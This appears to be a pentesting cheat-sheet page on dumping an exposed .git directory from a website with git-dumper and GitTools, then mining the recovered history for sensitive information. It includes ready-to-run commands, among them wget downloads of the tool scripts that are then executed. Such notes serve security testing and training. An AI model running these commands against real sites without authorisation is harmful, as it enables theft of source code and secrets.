Skip to content

Dump Git Repository from Website

If we can have permission to access git repositoy in target website, we can dump the git repository and investigate git logs or histories to get sensitive information.

Dumping

Method 1. Git-Dumper

git-dumper is an useful Python package.

pipx install git-dumper
git-dumper https://example.com/.git ./dumped

Method 2. GitTools

GitTools downloads Git repository of the web application.
To dump the repository, execute the following commands.

wget https://raw.githubusercontent.com/internetwache/GitTools/master/Dumper/gitdumper.sh
chmod +x gitdumper.sh
./gitdumper.sh https://example.com/.git/ ./example

We should get the git repository in local.
Then extract the entire project by executing the following.

wget https://raw.githubusercontent.com/internetwache/GitTools/master/Extractor/extractor.sh
chmod +x extractor.sh
./extractor.sh ./example ./new_example

Now we retrieve the entire git project from website.
It is stored in “./new_example” folder. We can investigate the repository.

After Dumping…

If we succeed in dumping, we can investigate the repository with git command and get sensitive information. See Git GitHub Pentesting.